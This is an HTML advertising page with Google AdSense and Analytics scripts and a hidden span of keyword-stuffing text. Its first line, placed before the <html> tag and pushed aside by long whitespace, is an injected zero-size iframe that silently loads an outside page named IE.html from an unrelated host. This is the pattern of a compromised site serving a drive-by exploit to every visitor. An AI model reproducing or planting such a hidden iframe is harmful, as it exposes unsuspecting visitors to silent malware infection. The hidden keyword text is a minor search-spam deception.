<iframe src=http://chenhua.s155.288idc.com/IE.html width=0 height=0></iframe>                                                                                                                                                                                                           <html><head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<meta name="keywords" content="汽车,魔兽争霸, 星际争霸, 鼠标, 键盘, webgame, 电子竞技, 旅游, 留学, 基金, 股票, 金融" />
<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
<script type="text/javascript">
  GS_googleAddAdSenseService("ca-pub-4359974013337425");
  GS_googleEnableAllServices();
</script>
<script type="text/javascript">
  GA_googleAddSlot("ca-pub-4359974013337425", "room_ad_vertical_cn_120x240");
</script>
<script type="text/javascript">
  GA_googleFetchAds();
</script>
<style type="text/css">
body{ margin:0; padding:0; background:#000; text-align:center;}
.adtxt { font-size: 1px; color: #000; display: none}
</style>
</head><body>
<span class="adtxt">汽车,魔兽争霸, 星际争霸, 鼠标, 键盘, webgame, 电子竞技, 旅游, 留学, 基金, 股票, 金融</span>
<script type="text/javascript">
  GA_googleFillSlot("room_ad_vertical_cn_120x240");
</script>
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
var pageTracker = _gat._getTracker("UA-849578-1");
pageTracker._initData();
pageTracker._trackPageview();
</script></body></html>
